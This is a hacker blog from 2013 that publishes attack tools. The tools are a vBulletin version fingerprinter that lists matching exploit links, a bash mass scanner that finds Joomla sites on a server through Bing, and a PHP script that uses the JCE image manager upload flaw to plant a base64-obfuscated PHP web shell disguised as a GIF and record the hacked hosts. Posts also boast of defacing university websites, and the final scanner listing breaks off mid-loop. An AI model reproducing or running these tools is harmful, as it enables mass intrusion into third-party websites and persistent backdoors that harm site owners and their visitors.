Tuesday, November 19, 2013

[V]bulletin Security Fingerprinter v1.0

Hi guys . [V]bulletin Security Fingerprinter v1.0 


#!/bin/bash
#
# VB-SFp - v1.0 [ public release ] - 240
#
#  RHH - Vbulletin Security Fingerprinter
#
# Author: Red V!per
#   Date: 2013 19 November
#    Web: www.redhathackers.org
# E-mail: beni_vanda[at]yahoo[dot]com
#
#

TIME="0"          # sleep time among each request
CURL="/usr/bin/curl"
GREP="/bin/grep"
CUT="/usr/bin/cut"

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

STRXPL="$B[+] EXPLOIT:$N"
Version=''
USER_AGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"



url=$1
vbulletin=( 
/archive/archive.css 
/clientscript/vbulletin_ajax_htmlloader.js
/clientscript/vbulletin_ajax_imagereg.js
/clientscript/vbulletin_ajax_namesugg.js
/clientscript/vbulletin_ajax_nameverif.js
/clientscript/vbulletin_ajax_quote.js
/clientscript/vbulletin_ajax_reputation.js
/clientscript/vbulletin_ajax_search.js
/clientscript/vbulletin_ajax_taglist.js
/clientscript/vbulletin_ajax_tagsugg.js
/clientscript/vbulletin_ajax_threadrate.js
/clientscript/vbulletin_ajax_threadslist.js
/clientscript/vbulletin_ajax_userlist.js
/clientscript/vbulletin_ajax_wolresolve.js
/clientscript/vbulletin_album.js
/clientscript/vbulletin_attachment.js
/clientscript/vbulletin_backgroundpicker.js
/clientscript/vbulletin_colorpicker.js
/clientscript/vbulletin_cpcolorpicker.js
/clientscript/vbulletin_cphome_scripts.js
/clientscript/vbulletin_cpoptions_scripts.js
/clientscript/vbulletin_custom_profile.js
/clientscript/vbulletin_date_picker.css
/clientscript/vbulletin_date_picker.js
/clientscript/vbulletin_editor.css
/clientscript/vbulletin_global.js
/clientscript/vbulletin_group_read_marker.js
/clientscript/vbulletin_important.css
/clientscript/vbulletin_inlinemod.js
/clientscript/vbulletin_lightbox.js
/clientscript/vbulletin_md5.js
/clientscript/vbulletin_menu.js
/clientscript/vbulletin_multi_quote.js
/clientscript/vbulletin_notifications_nopopups.js
/clientscript/vbulletin_post_loader.js
/clientscript/vbulletin_profilefield_edit.js
/clientscript/vbulletin_quick_comment.js
/clientscript/vbulletin_quick_comment_generic.js
/clientscript/vbulletin_quick_edit_groupmessage.js
/clientscript/vbulletin_quick_edit_picturecomment.js
/clientscript/vbulletin_quick_edit_visitormessage.js
/clientscript/vbulletin_quick_reply.js
/clientscript/vbulletin_read_marker.js
/clientscript/vbulletin_settings_validate.js
/clientscript/vbulletin_tabctrl.css
/clientscript/vbulletin_tabctrl.js
/clientscript/vbulletin_tabctrl_rtl.css
/clientscript/vbulletin_templatemgr.js
/clientscript/vbulletin_textedit.js
/clientscript/vbulletin_thrdpostlist.js
/clientscript/vbulletin_quick_edit.js
/clientscript/vbulletin_quick_edit_generic.js
/cpstyles/vBulletin_2_Default/controlpanel.css
/cpstyles/vBulletin_3_Default/controlpanel.css
/cpstyles/vBulletin_3_Frontend/controlpanel.css
/cpstyles/vBulletin_3_Manual/controlpanel.css
/cpstyles/vBulletin_3_Silver/controlpanel.css
)

Banner()
{
echo -e '\E[32m'"                                                     "; tput sgr0
echo -e '\E[32m'" __      ______    ______ _                          "; tput sgr0
echo -e '\E[32m'" \ \    / /  _ \  |  ____(_)                         "; tput sgr0
echo -e '\E[32m'"  \ \  / /| |_) | | |__   _ _ __   __ _  ___ _ __    "; tput sgr0
echo -e '\E[32m'"   \ \/ / |  _ <  |  __| | | '_ \ / _\ |/ _ \ '__|   "; tput sgr0
echo -e '\E[32m'"    \  /  | |_) | | |    | | | | | (_| |  __/ |      "; tput sgr0
echo -e '\E[32m'"     \/   |____/  |_|_   |_|_| |_|\__, |\___|_|      "; tput sgr0
echo -e '\E[32m'"            (_)     | |            __/ |             "; tput sgr0
echo -e '\E[32m'"  _ __  _ __ _ _ __ | |_ ___ _ __ |___/              "; tput sgr0
echo -e '\E[32m'" | '_ \| '__| | '_ \| __/ _ \ '__|                   "; tput sgr0
echo -e '\E[32m'" | |_) | |  | | | | | ||  __/ |                      "; tput sgr0
echo -e '\E[32m'" | .__/|_|  |_|_| |_|\__\___|_|                      "; tput sgr0
echo -e '\E[32m'" | |                                                 "; tput sgr0
echo -e '\E[32m'" |_|                                                 "; tput sgr0
echo -e 
echo -e "$B         -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.-       "
echo -e "         -       [V]bulletin Security Fingerprinter v1.0     -"
echo -e "-#-#-#-#-      Cod3d By: Red V!per [wWw.RedHatHackers.org]      -#-#-#-#-"
echo -e "         -                  IN GOD WE TRUST                  -"
echo -e "          -.-.-.-.-.-.-.-.-#-#-#-#-#-#-#-#-#-#-.-.-.-.-.-.-.-      $N "
echo 
}

Usage()
{
clear
echo
echo -e "$B  VB-SFp - v1.0 [public] - 240\n"
echo -e " -=============================================-\n"
echo -e "    <victim>                ->$N URL to victim installed Vbulletin"
echo -e "                               example: http://www.victim.com/vb\n"
echo -e "\n Run:$B ./VB-SFp.sh <victim> $N\n"
exit 1
}

Check_Arguments()
{
  if [ -z "$url" ] || [ "$url" == "-h" ] || [ "$url" == "--help" ]; then
  Usage;
  exit
  fi
}

Check_Vbulletin_Version()
{
for arr in "${vbulletin[@]}"
do
 Get_Version $arr

if [ ! -z "$Version" ];then
  break;
fi

done

if [ -z "$Version" ] 
 then
   echo -e "$B  [~] Not Found Version :| "
   read -p "  [~] Please Give Version Manual : " Version 
   echo
fi
Fingerpirint
}

Fingerpirint() 
{
echo -e "$B  [*] Target :\e[1;35m $url \e[0m"
echo -e "$B  [*] Version :\e[1;32m $Version [Ok] \e[0m"
echo
echo -e "$B  [*] \e[1;32m Avaliable Exploits for\e[0m \e[1;35m$Version \e[0m:" 
echo 

if [[ $Version == 3.8.4 ]] || [[ $Version == 3.8.5 ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/13911     (= 3.8.4 | 3.8.5)"
          echo
fi

if [[ $Version == 3.8.6 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/13459     (= 3.8.6 )"
          echo
fi

if [[ $Version == 4.0.4 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/13743     (= 4.0.4 )"
          echo
fi

if [[ $Version == 4.0.8 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/14877     (= 4.0.8 )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/14924     (= 4.0.8 PL1 )"
          echo
fi

if [[ $Version == 3.6.8 ]] || [[ $Version == 3.7.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/15531     (= 3.6.8| 3.7.x )"
          echo
fi

if [[ $Version == 3.8.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/15549     (= 3.8.x )"
          echo
fi

if [[ $Version == 3.1* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/15822     (= 3.1x )"
          echo
fi

res1=`expr $Version '<=' '4.1.3'`
res2=`expr $Version '>=' '4.0.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/16548     ( 4.0.x => 4.1.3 )"
          echo
fi

res1=`expr $Version '<=' '4.1.10'`
res2=`expr $Version '>=' '4.1.7'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/17824     ( 4.1.7 => 4.1.10 )"
          echo
fi

if [[ $Version == 3.*.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/18902     (= 3.x.x )"
          echo
fi


if [[ $Version == 4.0.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/16160     (= 4.0.x )"
          echo
fi

res1=`expr $Version '<=' '4.1.2'`
res2=`expr $Version '>=' '4.0.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/16147     ( 4.0.x => 4.1.3 )"
          echo
fi

if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/11737     (= 3.8.x|4.x.x )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/20984     (= 3.8.x|4.x.x )"
          echo
fi

if [[ $Version == 4.0.2 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/19293     (= 4.0.2 )"
          echo
fi

if [[ $Version == 3.*.* ]] || [[ $Version == 4.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/19677     (= 3.x.x|4.x.x )"
          echo
fi

res1=`expr $Version '<=' '1.1.9'`
if [ $res1 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/19722     ( <= 1.1.9 )"
          echo
fi

res1=`expr $Version '<=' '4.2.0'`
res2=`expr $Version '>=' '3.*.*'`
if [ $res1 -eq 1 -a $res2 -eq 1 ];
then
          echo -e "  $STRXPL http://1337day.com/exploit/19862     ( 3.x => 4.2.0 )"
          echo
fi

if [[ $Version == 4.2.0 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/19874     (= 4.2.0 )"
          echo
fi

if [[ $Version == 5.0.0 ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/19956    (= 5.0.0 )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/description/20002    (= 5.0.0 )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/description/20403    (= 5.0.0 )"
          echo
fi

if [[ $Version == 4.*.* ]] || [[ $Version == 5.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/20983     (= 4.x.x|5.x.x )"
          echo
          echo -e "  $STRXPL http://1337day.com/exploit/description/21518     (= 4.x.x|5.x.x )"
          echo
fi

if [[ $Version == 3.8.* ]] || [[ $Version == 4.*.* ]] ; then
          echo -e "  $STRXPL http://1337day.com/exploit/20984     (= 3.8.x|4.x.x )"
          echo
fi

if [[ $Version == 4.0.* ]]; then
          echo -e "  $STRXPL http://1337day.com/exploit/21029     (= 4.0.x )"
          echo
fi


}

Get_Version() 
{
 req=`$CURL -silent -A $USER_AGENT "$url/$1"` 

 Version=`echo "$req" | egrep -o 'vBulletin [0-9][^b]+' | awk '{gsub("vBulletin ","")}1' |$CUT -d ' ' -f 1`
}

Check_Arguments;
Banner
Check_Vbulletin_Version;
Download : http://www.mediafire.com/download/58ssjy6uikt59qw/vb-fingerprinter.sh
Posted by at No comments:

Sunday, September 8, 2013

SAPIENZA UNIVERSITA DI ROMA WAS HACKED

http://www.th3mirror.com/mirror/id/435812/
http://zone-hc.com/archive/mirror/1e9bc13_w3.disg.uniroma1.it_mirror_.html
Posted by at No comments:

3CA Get Alexa Rank



insert your sites in alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh) 

#!/bin/bash
# 3CA Get Alexa Rank 
# Usage : insert your sites in  alexa.lst file beside bash script and give permission to bash script (chmod +x script.sh) Then Run it (./script.sh) !!
#Coded by : Red V!per

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"


get_rank()
{
rm -rf alexa.php
wget -q --user-agent="Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" -O alexa.php "http://www.alexa.com/siteinfo/$1"
rank=`cat alexa.php | grep "Global rank" | cut -d '"' -f 5 | cut -d '>' -f 2 | cut -d '<' -f 1`
 
if [ ! -z "$rank" ] ; then
   echo -e "$B[+] $1 \e[1;32m[$rank] \e[0m"
   echo "$1 [$rank]" >> alexa_rank.lst
else
   echo -e "$B[-] $1 \e[1;31m[-] \e[0m"
fi
rm -rf alexa.php
}


for alexa in `cat alexa.lst`
do
get_rank $alexa
done
Posted by at No comments:

Estudar em Lisboa && ISEC University Hacked


Estudar em Lisboa && ISEC University Hacked

http://zone-h.org/mirror/id/20735001
http://zone-h.org/mirror/id/20735008
Posted by at No comments:

Tuesday, August 27, 2013

Red V!per Server Jce Scanner && Exploiter











D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4


insert jce.php beside bash script :

  
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per 
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz   : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com 
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#


#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear 
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||                                                      || "; tput sgr0
echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0 
echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0    
echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0 
echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e "   Server Jce Scanner && Exploiter"
echo 
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
page=0 
how_many=1 
single_page= 
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do 
  
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE" 
  
 wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url" 
  
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php` 
   
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3` 
  
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php ` 
  
  
  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt 
  rm -f domain_bing.php 
  let page=$page+1  
  done 
  
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
  
for domain in `cat domains.txt` 
   do 
     GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
      if [ $check -eq 0 ]
         then
           echo "www.$domain" > site.lst
           php jce.php site.lst shells.lst
        GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
        if [ $check2 -eq 0 ]
        then
        echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
        echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
        echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
        else
        echo "[-] www.$domain/ [No] "
        fi   
       else
         echo "[-] www.$domain/ [No] "
      fi   
   done 
rm -rf alldomain_bing.txt 
rm -rf domains.txt 
rm -rf site.lst 
rm -rf shells.lst
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 rm -rf alldomain_bing*
 rm -rf domains_f*
 rm -rf domains_f*
 rm -rf domain_bing* 
 rm -rf alldomain_bing*
 rm -rf domains*
 rm -rf jce_server*
 rm -rf site*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
chmod +x jce.php 

if [ ! -f shells.lst ]; then
    touch shells.lst ;
fi

Banner;
all_remove;
scan_jce_on_victim;
}

main;

jce.php  :

<?php

/*
# Mass Uploader   
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/

    $kirilmis = 0;

    $taranmis = 0;

    error_reporting(0);

    ini_set("max_execution_time", 0);

    ini_set("default_socket_timeout", 3);

    function oku($link)

    {

        $site         = parse_url($link);

        $link         = $site["path"];

        $site         = $site["host"];

        $httpresponse = "";

        $fp           = fsockopen($site, 80, $err_num, $err_msg, 30);

        if ($fp) {

            fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");

            fputs($fp, "Connection: close\n\n");

            while (!feof($fp)) {

                $http_response .= fgets($fp, 128);

            }

            fclose($fp);

        }

        return $http_response;

    }

    $dosya      = $argv[1];

    $kirilanlar = fopen($argv[2], 'w');

    $okunan = file($dosya);

    $toplam = count($okunan);

    foreach ($okunan as $sira => $satir) {

        $hatalisite = 0;

        $satir      = preg_replace("/[\\n\\r]+/", "", $satir);

        $url        = parse_url($satir);

        if ($url["scheme"])

            $host = $url["host"];

        else {

            $url  = parse_url("http://" . $satir);

            $host = $url["host"];

        }


        $packet = "Mua-Kontrol-Paketi-Panpa";


        $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

        if ($fp) {

            fwrite($fp, $packet);

            fclose($fp);

        }

        $content = "GIF89a1\n";

        $content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';

        $data = "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

        $data .= "/\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

        $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

        $data .= "0\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";

        $data .= "Content-Type: image/gif\r\n\r\n";

        $data .= "$content\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "0day\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";

        $data .= "upload\r\n";

        $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";

        $packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";

        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

        $packet .= "Accept-Language: en-us,en;q=0.5\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";

        $packet .= "Connection: Close\r\n";

        $packet .= "Proxy-Connection: close\r\n";

        $packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";

        $packet .= $data;


            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }


        $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: Mua \r\n";

        $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

        $packet .= "Accept-Language: en-US,en;q=0.8\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

        $packet .= "Accept-Encoding: deflate\n";

        $packet .= "X-Request: JSON\r\n";

        $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";

        $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";

        $packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";

        $packet .= $ren . "\r\n\r\n";

            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }

        $taranmis = $taranmis + 1;

            $kod      = oku("http://" . $host . "/images/stories/vanda.php");

            $pozisyon = strpos($kod, "GIF89a1");

            if ($pozisyon == true) {

                $kirilmis = $kirilmis + 1;

                fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");

            }
    } //for each


    fclose($yaz);

    fclose($kirilanlar);

Download Bash Script :http://www.mediafire.com/view/2rk5ikxu1k1kon3/jce-scanner-exploiter.sh

Download jce.php : http://www.mediafire.com/view/p8210ab5d0duj9y/jce.php



Posted by at 8 comments:

Friday, August 23, 2013

Server Jce Scanner




D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4

#!/bin/bash
# Jce Server Scanner
# Coded By : Red V!per  
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4
# Tnx 2   : All Turkish && Persian Hacker

#-------------------- Red V!per Banner ----------------------------------------------------------------------------

Banner()
{
clear 
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||                                                      || "; tput sgr0
echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0 
echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0     
echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0  
echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e "   Server Jce Scanner "
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
page=0  
how_many=1  
single_page=  
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do  
  
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  
 wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
    
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  
  
  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt  
  rm -f domain_bing.php  
  let page=$page+1   
  done  
  
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
  
for domain in `cat domains.txt`  
   do  
